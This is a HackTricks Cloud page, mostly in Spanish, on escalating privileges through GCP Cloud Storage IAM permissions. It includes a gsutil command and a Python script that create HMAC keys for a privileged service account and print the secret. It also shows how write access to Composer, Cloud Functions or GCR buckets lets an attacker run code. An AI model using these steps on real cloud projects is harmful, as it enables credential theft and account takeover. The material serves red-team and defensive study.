GCP - Storage Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Storage

Información Básica:

GCP - Storage Enum

`storage.objects.get`

Este permiso te permite descargar archivos almacenados dentro de Cloud Storage. Esto potencialmente te permitirá escalar privilegios porque en algunas ocasiones información sensible se guarda allí. Además, algunos servicios de GCP almacenan su información en buckets:

GCP Composer: Cuando creas un Entorno de Composer, el código de todos los DAGs se guardará dentro de un bucket. Estas tareas pueden contener información interesante dentro de su código.
GCR (Container Registry): La imagen de los contenedores se almacena dentro de buckets, lo que significa que si puedes leer los buckets podrás descargar las imágenes y buscar leaks y/o código fuente.

`storage.objects.setIamPolicy`

Puedes darte permiso para abusar de cualquiera de los escenarios anteriores de esta sección.

`storage.buckets.setIamPolicy`

Para un ejemplo sobre cómo modificar permisos con este permiso, consulta esta página:

GCP - Public Buckets Privilege Escalation

`storage.hmacKeys.create`

La función de "interoperabilidad" de Cloud Storage, diseñada para interacciones entre nubes como con AWS S3, implica la creación de claves HMAC para Cuentas de Servicio y usuarios. Un atacante puede explotar esto generando una clave HMAC para una Cuenta de Servicio con privilegios elevados, así escalando privilegios dentro de Cloud Storage. Mientras que las claves HMAC asociadas a usuarios solo son recuperables a través de la consola web, tanto las claves de acceso como las secretas permanecen perpetuamente accesibles, lo que permite un posible acceso de respaldo. Por otro lado, las claves HMAC vinculadas a Cuentas de Servicio son accesibles por API, pero sus claves de acceso y secretas no son recuperables después de la creación, añadiendo una capa de complejidad para el acceso continuo.

# Create key
gsutil hmac create <sa-email> # You might need to execute this inside a VM instance

## If you have TROUBLES creating the HMAC key this was you can also do it contacting the API directly:
PROJECT_ID = '$PROJECT_ID'
TARGET_SERVICE_ACCOUNT = f"exam-storage-sa-read-flag-3@{PROJECT_ID}.iam.gserviceaccount.com"
ACCESS_TOKEN = "$CLOUDSDK_AUTH_ACCESS_TOKEN"
import requests
import json
key = requests.post(
f'https://www.googleapis.com/storage/v1/projects/{PROJECT_ID}/hmacKeys',
params={'access_token': ACCESS_TOKEN, 'serviceAccountEmail': TARGET_SERVICE_ACCOUNT}
).json()
#print(json.dumps(key, indent=4))
print(f'ID: {key["metadata"]["accessId"]}')
print(f'Secret: {key["secret"]}')


# Configure gsutil to use the HMAC key
gcloud config set pass_credentials_to_gsutil false
gsutil config -a

# Use it
gsutil ls gs://[BUCKET_NAME]

# Restore
gcloud config set pass_credentials_to_gsutil true

Otro script de explotación para este método se puede encontrar aquí.

`storage.objects.create`, `storage.objects.delete` = Permisos de escritura en almacenamiento

Para crear un nuevo objeto dentro de un bucket necesitas storage.objects.create y, según la documentación, también necesitas storage.objects.delete para modificar un objeto existente.

Una explotación muy común de los buckets donde puedes escribir en la nube es en caso de que el bucket esté guardando archivos del servidor web, podrías ser capaz de almacenar nuevo código que será utilizado por la aplicación web.

Composer

Composer es Apache Airflow gestionado dentro de GCP. Tiene varias características interesantes:

Se ejecuta dentro de un clúster GKE, por lo que el SA que utiliza el clúster es accesible por el código que se ejecuta dentro de Composer.
Almacena el código en un bucket, por lo tanto, cualquiera con acceso de escritura sobre ese bucket podrá cambiar/agregar un código DGA (el código que ejecutará Apache Airflow) Entonces, si tienes acceso de escritura sobre el bucket que utiliza Composer para almacenar el código, puedes privesc al SA que se ejecuta en el clúster GKE.

Cloud Functions

El código de Cloud Functions se almacena en Storage, por lo que sobrescribirlo, es posible ejecutar código arbitrario.

App Engine

El código fuente de App Engine se almacena en buckets, sobrescribiendo el código podría ser posible ejecutar código arbitrario. ESTO NO ES POSIBLE.
Parece que las capas de contenedor se almacenan en el bucket, ¿quizás cambiando esas?

GCR

Google Container Registry almacena las imágenes dentro de buckets, si puedes escribir en esos buckets podrías ser capaz de moverte lateralmente a donde se están ejecutando esos buckets.
El bucket utilizado por GCR tendrá una URL similar a gs://<eu/usa/asia/nothing>.artifacts.<project>.appspot.com (Los subdominios de nivel superior están especificados aquí).